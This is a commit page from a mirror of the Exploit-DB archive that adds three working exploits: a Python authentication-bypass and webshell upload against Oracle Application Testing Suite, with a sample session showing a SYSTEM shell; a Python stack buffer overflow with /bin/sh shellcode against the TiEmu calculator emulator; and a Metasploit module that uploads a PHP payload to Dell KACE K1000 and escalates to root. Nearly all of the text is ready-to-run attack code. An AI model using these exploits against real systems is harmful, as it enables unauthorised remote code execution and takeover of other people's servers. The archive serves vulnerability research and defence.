bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-04-14

Browse source 
3 new exploits

Oracle Application Testing Suite 12.4.0.2.0 - Authentication Bypass and Arbitrary File Upload Exploit
Texas Instrument Emulator 3.03 - Local Buffer Overflow
Dell KACE K1000 File Upload
This commit is contained in:
Offensive Security 2016-04-14 05:02:17 +00:00
parent 95ea5e17e0
commit 1e62f55c1a
4 changed files with 307 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

3
files.csv
View file

@ -35908,3 +35908,6 @@ id,file,description,date,author,platform,type,port
39686,platforms/android/dos/39686.txt,"Android - IMemory Native Interface is Insecure for IPC Use",2016-04-11,"Google Security Research",android,dos,0
39687,platforms/jsp/webapps/39687.txt,"Novell Service Desk 7.1.0_ 7.0.3 and 6.5 - Multiple Vulnerabilities",2016-04-11,"Pedro Ribeiro",jsp,webapps,0
39688,platforms/php/webapps/39688.txt,"Ovidentia troubleticketsModule 7.6 - Remote File Inclusion",2016-04-12,bd0rk,php,webapps,80
39691,platforms/jsp/webapps/39691.py,"Oracle Application Testing Suite 12.4.0.2.0 - Authentication Bypass and Arbitrary File Upload Exploit",2016-04-13,"Zhou Yu",jsp,webapps,8088
39692,platforms/linux/local/39692.py,"Texas Instrument Emulator 3.03 - Local Buffer Overflow",2016-04-13,"Juan Sacco",linux,local,0
39693,platforms/unix/remote/39693.rb,"Dell KACE K1000 File Upload",2016-04-13,metasploit,unix,remote,0

Can't render this file because it is too large.

107
platforms/jsp/webapps/39691.py Executable file
View file

@ -0,0 +1,107 @@
# Exploit Title: Oracle Application Testing Suite Authentication Bypass and Arbitrary File Upload Remote Exploit
# Exploit Author: Zhou Yu <504137480@qq.com >
# Vendor Homepage: http://www.oracle.com/
# Software Link: http://www.oracle.com/technetwork/oem/downloads/apptesting-downloads-1983826.html?ssSourceSiteId=otncn
# Version: 12.4.0.2.0
# Tested on: Win7 SP1 32-bit
# CVE : CVE-2016-0492 and CVE-2016-0491
import urllib2
import urllib
ip = '192.168.150.239'
port = 8088
url = "http://" + ip + ":" + str(port)
#bypass authentication
url = url+"/olt/Login.do/../../olt/UploadFileUpload.do"
request = urllib2.Request(url)
webshell_content='''
<%@ page import="java.util.*,java.io.*" %>
<%
if (request.getParameter("{cmd}") != null) {{
Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("{cmd}"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while (disr != null) {{
out.println(disr);
disr = dis.readLine();
}}
}}
%>
'''
boundary = "---------------------------7e01e2240a1e"
request.add_header('Content-Type', "multipart/form-data; boundary=" + boundary)
post_data = "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"storage.extension\"\r\n"
post_data = post_data + "\r\n.jsp\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"fileName1\"\r\n"
post_data = post_data + "\r\nwebshell.jsp\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"fileName2\"\r\n"
post_data = post_data + "\r\n\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"fileName3\"\r\n"
post_data = post_data + "\r\n\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"fileName4\"\r\n"
post_data = post_data + "\r\n\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"fileType\"\r\n"
post_data = post_data + "\r\n*\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"file1\"; filename=\"webshell.jsp\"\r\n"
post_data = post_data + "Content-Type: text/plain\r\n"
post_data = post_data + "\r\n" + webshell_content +"\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"storage.repository\"\r\n"
post_data = post_data + "\r\nDefault\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"storage.workspace\"\r\n"
post_data = post_data + "\r\n.\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"directory\"\r\n"
post_data = post_data + "\r\n" + "../oats\servers\AdminServer\\tmp\_WL_user\oats_ee\\1ryhnd\war\pages" +"\r\n"
post_data = post_data + "--" + boundary + "--"+"\r\n"
try:
request.add_data(post_data)
response = urllib2.urlopen(request)
if response.code == 200 :
print "[+]upload done!"
webshellurl = "http://" + ip + ":" + str(port) + "/olt/pages/webshell.jsp"
print "[+]wait a moment,detecting whether the webshell exists..."
if urllib2.urlopen(webshellurl).code == 200 :
print "[+]upload webshell successfully!"
print "[+]return a cmd shell"
while True:
cmd = raw_input(">>: ")
if cmd == "exit" :
break
print urllib.urlopen(webshellurl+"?{cmd}=" + cmd).read().lstrip()
else:
print "[-]attack fail!"
else:
print "[-]attack fail!"
except Exception as e:
print "[-]attack fail!"
'''
#run the exploit and get a cmd shell
root@kali:~/Desktop# python exploit.py
[+]upload done!
[+]wait a moment,detecting whether the webshell exists...
[+]upload webshell successfully!
[+]return a cmd shell
>>: whoami
nt authority\system
>>: exit
'''

70
platforms/linux/local/39692.py Executable file
View file

@ -0,0 +1,70 @@
# Exploit Author: Juan Sacco - http://www.exploitpack.com -
jsacco@exploitpack.com
# Program affected: Texas Instruments calculators emulator (without GDB)
# Version: 3.03-nogdb+dfsg-3
#
# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
# Program description: TiEmu emulates Texas Instruments calculators TI
9/92/92+/V200PLT.
# Kali Linux 2.0 package: pool/main/t/tiemu/tiemu_3.03-nogdb+dfsg-3_i386.deb
# MD5sum: 79a42bb40dfa8437b6808a9072faf001
# Website: http://lpg.ticalc.org/prj_tiemu/
#
#
# Starting program: /usr/bin/tiemu -rom=$(python -c 'print "A"*80')
# [Thread debugging using libthread_db enabled]
# Using host libthread_db library
"/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
# TiEmu 3 - Version 3.03
# THIS PROGRAM COMES WITH ABSOLUTELY NO WARRANTY
# PLEASE READ THE DOCUMENTATION FOR DETAILS
#
# Program received signal SIGSEGV, Segmentation fault.
#
# 0x41414141 in ?? ()
#
# gdb$ backtrace
#0 0xb7fdebe0 in __kernel_vsyscall ()
#1 0xb6ec9367 in __GI_raise (sig=sig@entry=0x6) at
../nptl/sysdeps/unix/sysv/linux/raise.c:56
#2 0xb6ecaa23 in __GI_abort () at abort.c:89
#3 0xb6f07778 in __libc_message (do_abort=do_abort@entry=0x2,
fmt=fmt@entry=0xb6ffd715 "*** %s ***: %s
#4 0xb6f97b85 in __GI___fortify_fail (msg=msg@entry=0xb6ffd6fd "stack
smashing detected") at fortify_fail.c:31
#5 0xb6f97b3a in __stack_chk_fail () at stack_chk_fail.c:28
#6 0x0811beb3 in _start ()
import os,subprocess
def run():
try:
print "# Texas Instrument Emulator Buffer Overflow by Juan Sacco"
print "# This exploit is for educational purposes only"
# JUNK + SHELLCODE + NOPS + EIP
junk = "\x41"*84
shellcode =
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
nops = "\x90"*12
eip = "\xd1\xf3\xff\xbf"
subprocess.call(["tiem ",'-rom= ', junk + shellcode + nops + eip])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "Sorry, Texas Instrument emulator not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Snap! Something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit Tiem 3.03-nogdb+dfsg-3 Local Overflow Exploit"
print "Author: Juan Sacco"
except IndexError:
howtousage()
run()

127
platforms/unix/remote/39693.rb Executable file
View file

@ -0,0 +1,127 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Dell KACE K1000 File Upload',
'Description' => %q{
This module exploits a file upload vulnerability in Kace K1000
versions 5.0 to 5.3, 5.4 prior to 5.4.76849 and 5.5 prior to 5.5.90547
which allows unauthenticated users to execute arbitrary commands
under the context of the 'www' user.
This module also abuses the 'KSudoClient::RunCommandWait' function
to gain root privileges.
This module has been tested successfully with Dell KACE K1000
version 5.3.
},
'License' => MSF_LICENSE,
'Privileged' => true,
'Platform' => 'unix', # FreeBSD
'Arch' => ARCH_CMD,
'Author' =>
[
'Bradley Austin (steponequit)', # Initial discovery and exploit
'Brendan Coles <bcoles[at]gmail.com>', # Metasploit
],
'References' =>
[
['URL', 'http://console-cowboys.blogspot.com/2014/03/the-curious-case-of-ninjamonkeypiratela.html']
],
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x27",
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl'
}
},
'DefaultTarget' => 0,
'Targets' =>
[
['Automatic Targeting', { 'auto' => true }]
],
'DisclosureDate' => 'Mar 7 2014'))
end
def check
res = send_request_cgi('uri' => normalize_uri('service', 'kbot_upload.php'))
unless res
vprint_error('Connection failed')
return Exploit::CheckCode::Unknown
end
if res.code && res.code == 500 && res.headers['X-DellKACE-Appliance'].downcase == 'k1000'
if res.headers['X-DellKACE-Version'] =~ /\A([0-9])\.([0-9])\.([0-9]+)\z/
vprint_status("Found Dell KACE K1000 version #{res.headers['X-DellKACE-Version']}")
if $1.to_i == 5 && $2.to_i <= 3 # 5.0 to 5.3
return Exploit::CheckCode::Vulnerable
elsif $1.to_i == 5 && $2.to_i == 4 && $3.to_i <= 76849 # 5.4 prior to 5.4.76849
return Exploit::CheckCode::Vulnerable
elsif $1.to_i == 5 && $2.to_i == 5 && $3.to_i <= 90547 # 5.5 prior to 5.5.90547
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
def exploit
# upload payload
fname = ".#{rand_text_alphanumeric(rand(8) + 5)}.php"
payload_path = "/kbox/kboxwww/tmp/"
post_data = "<?php require_once 'KSudoClient.class.php';KSudoClient::RunCommandWait('rm #{payload_path}#{fname};#{payload.encoded}');?>"
print_status("Uploading #{fname} (#{post_data.length} bytes)")
res = send_request_cgi(
'uri' => normalize_uri('service', 'kbot_upload.php'),
'method' => 'POST',
'vars_get' => Hash[{
'filename' => fname,
'machineId' => "#{'../' * (rand(5) + 4)}#{payload_path}",
'checksum' => 'SCRAMBLE',
'mac' => rand_text_alphanumeric(rand(8) + 5),
'kbotId' => rand_text_alphanumeric(rand(8) + 5),
'version' => rand_text_alphanumeric(rand(8) + 5),
'patchsecheduleid' => rand_text_alphanumeric(rand(8) + 5) }.to_a.shuffle],
'data' => post_data)
unless res
fail_with(Failure::Unreachable, 'Connection failed')
end
if res.code && res.code == 200
print_good('Payload uploaded successfully')
else
fail_with(Failure::UnexpectedReply, 'Unable to upload payload')
end
# execute payload
res = send_request_cgi('uri' => normalize_uri('tmp', fname))
unless res
fail_with(Failure::Unreachable, 'Connection failed')
end
if res.code && res.code == 200
print_good('Payload executed successfully')
elsif res.code && res.code == 404
fail_with(Failure::NotVulnerable, "Could not find payload '#{fname}'")
else
fail_with(Failure::UnexpectedReply, 'Unable to execute payload')
end
end
end